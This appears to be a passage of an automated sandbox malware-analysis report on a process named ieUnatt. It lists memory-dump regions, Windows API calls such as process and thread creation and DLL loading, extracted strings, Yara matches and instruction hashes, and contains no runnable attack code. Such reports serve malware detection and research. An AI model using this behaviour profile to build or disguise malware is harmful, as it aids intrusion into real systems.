                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 3fe5a76537a08d9c4d659fd7b14c579903c711dfcbe0ab75362aba27c0860c19
                                                                      • Instruction ID: 6cf0ab0f7f3e9cc6ef0a1c9a27cb39fd108d19adae8ef6b44434ee77ce4fd596
                                                                      • Opcode Fuzzy Hash: 3fe5a76537a08d9c4d659fd7b14c579903c711dfcbe0ab75362aba27c0860c19
                                                                      • Instruction Fuzzy Hash: FA900222211C0042E20076699C54B0F04158BD1303F95C159A0154564CC91689615525
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 9494f4faf584a63aea2a10df2ea7dfc00e0a5689bebb088b96280dda424d2d8c
                                                                      • Instruction ID: af67b4a966959a70f803be64258a5efbd33f0c98f877c3c692167b51d18f2ce2
                                                                      • Opcode Fuzzy Hash: 9494f4faf584a63aea2a10df2ea7dfc00e0a5689bebb088b96280dda424d2d8c
                                                                      • Instruction Fuzzy Hash: EC90022260140502E1017259944461E041A8BD1241FD5C066A1024565ECA268A92A135
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: b6875f34f26cebb4b03967922468f79238b077ca348c6d465dff72938d18560e
                                                                      • Instruction ID: 2a4d025e3856208e41e18b94fd3716dc80d1888185f34c2abea1c29f5189f2b9
                                                                      • Opcode Fuzzy Hash: b6875f34f26cebb4b03967922468f79238b077ca348c6d465dff72938d18560e
                                                                      • Instruction Fuzzy Hash: 7F90026220180403E1407659984460F04158BD1302F95C055A2064565E8A2A8D516139
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 441f744a61432543cac911c91a4771ac40a01441861a284dbebd6536b3088241
                                                                      • Instruction ID: 7f94712ef185cbb6355c0010f8fcd925d8cb7a8dd1500819055ec667d1306d28
                                                                      • Opcode Fuzzy Hash: 441f744a61432543cac911c91a4771ac40a01441861a284dbebd6536b3088241
                                                                      • Instruction Fuzzy Hash: 7D9002622024000351057259945461E441A8BE1201B95C065E10145A0DC52689916129
                                                                      APIs
                                                                      • Sleep.KERNELBASE(000007D0), ref: 02F841BB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID: net.dll$wininet.dll
                                                                      • API String ID: 3472027048-1269752229
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InitializeUninitialize
                                                                      • String ID: @J7<
                                                                      • API String ID: 3442037557-2016760708
                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02F74C42
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID:
                                                                      • API String ID: 2234796835-0
                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,02F723B0,02F8860F,02F85CCF,02F72380), ref: 02F787F3
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorMode
                                                                      • String ID:
                                                                      • API String ID: 2340568224-0
                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02F74C42
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID:
                                                                      • API String ID: 2234796835-0
                                                                      APIs
                                                                      • CreateProcessInternalW.KERNELBASE(?,?,B416F980,?,02F7898E,00000010,?,?,?,00000044,?,00000010,02F7898E,?,B416F980,?), ref: 02F89F43
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateInternalProcess
                                                                      • String ID:
                                                                      • API String ID: 2186235152-0
                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 02F789FC
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      APIs
                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02F69F45
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateThread
                                                                      • String ID:
                                                                      • API String ID: 2422867632-0
                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 02F789FC
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,D08CFFD5,00000007,00000000,00000004,00000000,02F74434,000000F4), ref: 02F89E8C
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID:
                                                                      • API String ID: 3298025750-0
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(02F720B9,?,02F85E8F,02F720B9,02F85CCF,02F85E8F,?,02F720B9,02F85CCF,00001000,?,?,00000000), ref: 02F89E3C
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 02F789FC
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,02F723B0,02F8860F,02F85CCF,02F72380), ref: 02F787F3
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorMode
                                                                      • String ID:
                                                                      • API String ID: 2340568224-0
                                                                      APIs
                                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000), ref: 02F7149D
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID:
                                                                      • API String ID: 1836367815-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4087025874.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5390000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4087025874.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5390000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                      • API String ID: 0-3754132690
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4087025874.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5390000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "1*l$&lrr$',40$',40$*(&c$+1,.$,jc$//"l$c&-n$msmu$qsck$tqmq$umrx$vmsc$vpwm$vpwm
                                                                      • API String ID: 0-3311200144
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                      • API String ID: 48624451-2108815105
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                      • API String ID: 48624451-2108815105
                                                                      Strings
                                                                      • Execute=1, xrefs: 050E4713
                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 050E4742
                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 050E46FC
                                                                      • ExecuteOptions, xrefs: 050E46A0
                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 050E4725
                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 050E4655
                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 050E4787
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                      • API String ID: 0-484625025
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: __aulldvrm
                                                                      • String ID: +$-$0$0
                                                                      • API String ID: 1302938615-699404926
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: %%%u$[$]:%u
                                                                      • API String ID: 48624451-2819853543
                                                                      Strings
                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 050E02BD
                                                                      • RTL: Re-Waiting, xrefs: 050E031E
                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 050E02E7
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                      • API String ID: 0-2474120054
                                                                      Strings
                                                                      • RTL: Re-Waiting, xrefs: 050E7BAC
                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 050E7B7F
                                                                      • RTL: Resource at %p, xrefs: 050E7B8E
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                      • API String ID: 0-871070163
                                                                      • Opcode ID: d2ce7f815aa8a64eef77c43b6a4afb77c664d8558f351bbc9d18b01abd42ab72
                                                                      • Instruction ID: 97360919cbb627aea1378b7e06e770a02eb86c9576032acf5377ddf5693a9376
                                                                      • Opcode Fuzzy Hash: d2ce7f815aa8a64eef77c43b6a4afb77c664d8558f351bbc9d18b01abd42ab72
                                                                      • Instruction Fuzzy Hash: 5B41E2363047429FC720DE29E841B6EB7E6FF88720F140A1DE95A9B681DB71E8058B91
                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 050E728C
                                                                      Strings
                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 050E7294
                                                                      • RTL: Re-Waiting, xrefs: 050E72C1
                                                                      • RTL: Resource at %p, xrefs: 050E72A3
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                      • API String ID: 885266447-605551621
                                                                      • Opcode ID: d4e51b334e41df821c160cdaf3dd6162f7aa520cada5442e4ef05e45b8a5e93b
                                                                      • Instruction ID: ac1dc3dfbbe29716bcf31d25700f28e135c6a1f594ca353be45a3ab5a7ffe812
                                                                      • Opcode Fuzzy Hash: d4e51b334e41df821c160cdaf3dd6162f7aa520cada5442e4ef05e45b8a5e93b
                                                                      • Instruction Fuzzy Hash: BC41DD32704242AFD721DE64EC41FAEB7E6FF94710F240619FD56AB240DB21E8029BD1
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: %%%u$]:%u
                                                                      • API String ID: 48624451-3050659472
                                                                      • Opcode ID: 22faf3414172cc226c8be902b2a98a2cef65314771501df62f178c32906ec09f
                                                                      • Instruction ID: af63f2ff1f292046b7db09f86cb8b02980d0eab2f5f32a7a006b75acc1d096a1
                                                                      • Opcode Fuzzy Hash: 22faf3414172cc226c8be902b2a98a2cef65314771501df62f178c32906ec09f
                                                                      • Instruction Fuzzy Hash: EC316676A002299FDB60DF29DC54FFEB7F8FF48610F444555E859E3240EB30AA549BA0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: __aulldvrm
                                                                      • String ID: +$-
                                                                      • API String ID: 1302938615-2137968064
                                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                      • Instruction ID: b51254816830ab7a50109bbc7195ff29ea5d47d2772674cd9f792445cdef57d1
                                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                      • Instruction Fuzzy Hash: 2991B170E0420A9AFF64DE69E8C2AFEB7F6FF84360F14451AE865E72D0D7B089418714
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $$@
                                                                      • API String ID: 0-1194432280
                                                                      • Opcode ID: 4991b19426dc234e82d1fd0bcc907264484902ef7037d65c354808b2b52a62d3
                                                                      • Instruction ID: 2091e35b49230a3a3313d8f2fed4f82fe33d8006a77040c0121a738478decc1c
                                                                      • Opcode Fuzzy Hash: 4991b19426dc234e82d1fd0bcc907264484902ef7037d65c354808b2b52a62d3
                                                                      • Instruction Fuzzy Hash: EF814A75E002699BDB31DB54DC45BEEB7B4AF08750F0445EAE91AB7280E7319E80CFA4
                                                                      APIs
                                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 050FCFBD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: CallFilterFunc@8
                                                                      • String ID: @$@4Cw@4Cw
                                                                      • API String ID: 4062629308-3101775584
                                                                      • Opcode ID: 3042e9e6c059d37503740be74e75b6b12bb4630c4c345e1a67b32155ac91ab92
                                                                      • Instruction ID: f42fe3e8e86d086ce452a8565ab4b69887d14a1115f690b5104baf49c34e8740
                                                                      • Opcode Fuzzy Hash: 3042e9e6c059d37503740be74e75b6b12bb4630c4c345e1a67b32155ac91ab92
                                                                      • Instruction Fuzzy Hash: 1041AD72A00218EFDB21EFA4E841AAEFBF8FF54B00F04442AEA15DB650D7748841DB61